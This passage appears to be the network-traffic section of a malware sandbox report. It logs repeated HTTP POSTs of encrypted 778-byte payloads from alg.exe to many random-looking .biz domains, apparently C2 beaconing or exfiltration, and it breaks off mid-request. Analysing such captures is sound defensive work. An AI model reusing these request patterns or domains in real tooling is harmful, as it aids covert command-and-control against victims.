Oct 28, 2024 16:50:57.420901060 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=558f48b19845872a424e6cb87299d6ae|155.94.241.188|1730130657|1730130657|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50002 | 35.164.78.200 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:57.635310888 CET | 349 | OUT | POST /oekfiuj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:57.635310888 CET | 778 | OUT | Data Raw: 33 b4 53 01 85 c2 63 67 fe 02 00 00 81 e3 50 8c cb 12 12 92 3c 18 10 bd 83 1f 65 f1 7a a1 4d 4a d8 49 68 3a 55 eb 70 65 14 41 50 80 ad d4 19 7f c7 26 63 fe d0 d5 5a c4 ed f7 8b 4e 82 80 06 7b 98 6b a3 f8 82 e9 11 0e 9a 23 79 e4 4b c9 b7 4f 90 b6
Data Ascii: 3ScgP<ezMJIh:UpeAP&cZN{k#yKOE 8zO{2pE(6hH.Y9l 3!@f27In JBT,D,giO&n-B5;Y6'DmIrydlH w.
Oct 28, 2024 16:50:58.464307070 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5bda80ace70fedb4d5cffeeeee0124b4|155.94.241.188|1730130658|1730130658|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50003 | 3.94.10.34 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:58.655952930 CET | 346 | OUT | POST /e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:58.655973911 CET | 778 | OUT | Data Raw: 5d 37 44 3d 25 63 74 d4 fe 02 00 00 a1 b4 e3 67 24 b2 63 52 d0 09 49 c0 cc 3c 34 06 c3 57 b6 b4 43 c8 c7 47 ab 30 6f 86 fc 30 45 6b 74 b1 af 20 af ec 18 ec 64 e5 ec 20 6d 6e 4d 8a f7 26 66 6c 8f e1 cf 05 f9 31 8f dd 42 d7 a5 8b d4 8a ef 9f d8 88
Data Ascii: ]7D=%ctg$cRI<4WCG0o0Ekt d mnM&fl1B3e++*I,Aw+/CT=E:AV/r5&a4H33A;N8JzeYyT oNns]|&f5%iX8DBTyc&XF#
Oct 28, 2024 16:50:59.331190109 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=af7c045dc33671baf90c6efe1935adbe|155.94.241.188|1730130659|1730130659|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50004 | 165.160.15.20 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:59.546041965 CET | 348 | OUT | POST /inljiti HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:59.546065092 CET | 778 | OUT | Data Raw: b8 b9 2d da 69 e9 15 f9 fe 02 00 00 8f 35 e1 49 99 97 1a 93 2f 9b 58 a5 b4 96 1c 3a 60 c3 05 18 0c 14 f0 4d db c7 d9 eb c3 ec d7 97 5c d5 a2 e9 67 ea dc 1e ef 74 65 70 f9 70 3b 02 4b ab 3d 41 83 22 77 21 de 1d 4f bf 48 67 ed 7f 7b 35 2c d0 28 69
Data Ascii: -i5I/X:`M\gtepp;K=A"w!OHg{5,(iA`k)tVU|q{ap9*Wys@k|2eAlso_m3]b76_FNI<oYj?V}k1Y8^VeGU[fV.Z6Tx]gOL`A=._It
Oct 28, 2024 16:51:00.382225990 CET | 170 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 15:51:00 GMT
Content-Length: 94
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 28, 2024 16:51:00.437275887 CET | 347 | OUT | POST /afgoll HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:00.437294960 CET | 778 | OUT | Data Raw: 15 37 dd 77 f6 c5 df af fe 02 00 00 e6 d8 ad c4 ff 4b b2 12 d4 e3 8c 84 cb f0 ff e5 9e 3f 2b d9 ce c0 ac 26 db e1 81 3d 53 08 5d 90 45 18 75 cc 96 ed 6a 4c e8 f6 8c 39 5a ff 3a af 2e 67 a3 88 af ea 1f 41 c8 63 43 72 a3 95 ed 8a c4 83 b5 80 e2 91
Data Ascii: 7wK?+&=S]EujL9Z:.gAcCr}klWytEaeB!p^|g\X\oyNgEuIJ~sE1?z`>.N?@aC&(R#hJy<SA8rY
Oct 28, 2024 16:51:00.682236910 CET | 170 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 15:51:00 GMT
Content-Length: 94
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50005 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:00.974608898 CET | 346 | OUT | POST /y HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:01.809478998 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8ef1b05bb23c3bcd9ce71c05f225a40b|155.94.241.188|1730130661|1730130661|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50006 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:03.271425962 CET | 353 | OUT | POST /qtybvvfgdyqy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:04.090595961 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ef7cdfbd05af0118a88500fe0c75e5f4|155.94.241.188|1730130663|1730130663|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50007 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:04.378541946 CET | 359 | OUT | POST /bdnjndwcxvdfjwt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:05.209378004 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70e2d56aae9c68e5436d319b98194255|155.94.241.188|1730130665|1730130665|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50008 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:05.418046951 CET | 351 | OUT | POST /krccyasm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:05.418077946 CET | 778 | OUT | Data Raw: 78 76 39 25 77 36 08 d2 fe 02 00 00 62 31 86 af ea 23 df 7b e3 ec 09 41 00 11 b5 d7 6c 77 d7 38 59 1e 88 4a c4 cd 0c 62 66 39 95 57 bb e8 3e 94 4c 28 8e 91 cf c2 0a 02 b1 40 08 78 0c 9c 1b 6b d0 f2 84 3c c5 ef 54 d1 46 01 20 5c 16 d6 5e 6f 39 bb
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: xv9%w6b1#{Alw8YJbf9W>L(@xk<TF \^o9@F$r0120>nnwTYU(W3]A.e$^b9F6o-$J>!OGeW\=(GIKoO266"cY@nzjaa
Oct 28, 2024 16:51:06.862579107 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=75a5d7541f096ab5a20c3c8a13c7ff80|155.94.241.188|1730130666|1730130666|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50009 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:07.212038994 CET | 345 | OUT | POST /tlre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:07.212064028 CET | 778 | OUT | Data Raw: 64 3d 56 53 f1 03 fb b9 fe 02 00 00 22 c9 94 2c 6f ef 08 a3 af a5 4b 85 c3 20 c3 63 c2 af 26 2d 36 b4 e4 de 37 90 86 35 07 39 73 a5 ce 67 47 7e e1 26 d0 c5 7f 1f 73 b9 cc 07 97 9e d5 ca ce 36 86 ff 4c 96 6c 12 45 ee 94 36 2a 54 e4 e0 fc 41 ad 37
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d=VS",oK c&-6759sgG~&s6LlE6*TA7R"tr3QF5rCr=bmXR_9jiW/ns e3jq}?ww"y4rmri5es
Oct 28, 2024 16:51:07.875771999 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=73e8c0ab4e3c44063b31ff900e2ab99a|155.94.241.188|1730130667|1730130667|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50010 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:08.496460915 CET | 346 | OUT | POST /tj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:08.496480942 CET | 778 | OUT | Data Raw: bb 41 f9 e4 1b 00 65 ea fe 02 00 00 0c ce e5 00 71 5a 78 1b fe 7b ef 4d b9 52 fb 74 0a 14 e5 61 c0 51 f2 b2 f1 f8 b0 05 2d 1f 7b 4e 5d 5d 34 48 de 8f c3 05 c2 cd 63 d9 d0 20 15 82 ff 3f 4a 07 e1 34 a6 8c 13 4c 88 0f 65 1b 51 25 3c fd c5 85 ac aa
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: AeqZx{MRtaQ-{N]]4Hc ?J4LeQ%<|*z1^l}z2r?scKz(WT.>A(Kjwar:S_=*#h7 .v?`8e*=7gNiR/&b%eoSv
Oct 28, 2024 16:51:09.173051119 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8d408b1c3469e393eb44a625ae59c77c|155.94.241.188|1730130669|1730130669|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50011 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:09.642513990 CET | 347 | OUT | POST /ewf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:09.642548084 CET | 778 | OUT | Data Raw: 7a 07 df cb db a4 0e 70 fe 02 00 00 ac ca bd 27 f5 0e 40 58 e9 7a 52 24 c1 72 3f 9c 60 ac 18 51 20 03 bd c4 c2 44 37 d7 c9 47 a8 e5 8b 82 0a dd 83 61 0d 69 12 72 e1 5b db df cc 56 22 91 95 fd 1b 93 ac 68 8d 79 eb 44 b7 ad 72 93 22 b0 c3 bd 34 8b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: zp'@XzR$r?`Q D7Gair[V"hyDr"4g"WDLE4&fN_=sfU$vE@AUpZ^ Z&[VXZ4}0`dL^_2*k*F.SPUReasFXZ?o$*}iKE^~RtUtj
Oct 28, 2024 16:51:11.084306002 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=253a3806f9c259280561d5e2ce9c873c|155.94.241.188|1730130670|1730130670|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50012 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:11.343101978 CET | 355 | OUT | POST /vdqmhlkrsphqhe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:11.343113899 CET | 778 | OUT | Data Raw: 34 1f 7b 3a f3 99 26 33 fe 02 00 00 72 4e 94 d8 4a 4c cb 2c 51 8b 7a 79 34 81 4e 72 65 c6 8e 2c 92 ce 54 b3 d2 87 2f 4c 5d 48 ef 44 3e 39 3e 5e 2a 28 46 81 28 7b c0 6b 89 cc bb 21 56 61 c7 d7 91 de e9 2a 5a f9 f2 90 7c 7d 1e 10 ac 08 1f 4d f0 79
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 4{:&3rNJL,Qzy4Nre,T/L]HD>9>^*(F({k!Va*Z|}MyaCF;'1T(ukvqm02x}ZIG4i_y/P:L2[6p!kT|%/m%VwSNX05{4,T~K.d2]'~T#
Oct 28, 2024 16:51:12.182885885 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=ebd04cd36d95deaa954bafe702363840|155.94.241.188|1730130672|1730130672|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50013 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:12.522211075 CET | 360 | OUT | POST /yqjotihouwfthlkr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:12.522242069 CET | 778 | OUT | Data Raw: 27 ab e4 16 5c a8 57 c5 fe 02 00 00 85 f8 20 2e 2a 07 40 b5 b1 11 5e 9f 7f e7 7f 0b a4 9b 5d 82 4d 36 88 8d a8 c2 2a 1d cc b5 6d 5a 0a 4e fb 88 53 f6 1a 05 f1 7d 74 00 06 93 3d fc 78 63 27 8b d7 7c 95 63 90 5d be 88 d4 c3 42 63 f1 14 e0 c0 a1 1f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: '\W .*@^]M6*mZNS}t=xc'|c]Bc583l6l\e3oZ-*r)l&']%/.Dig4=ie58vX\d=.fm'#VbyE6W9}G(-KxjO#aRp$
Oct 28, 2024 16:51:13.197910070 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=12406b6a2ea71b24657099ea48943793|155.94.241.188|1730130673|1730130673|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50014 | 13.251.16.150 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:13.852926970 CET | 352 | OUT | POST /oukjvuscvd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
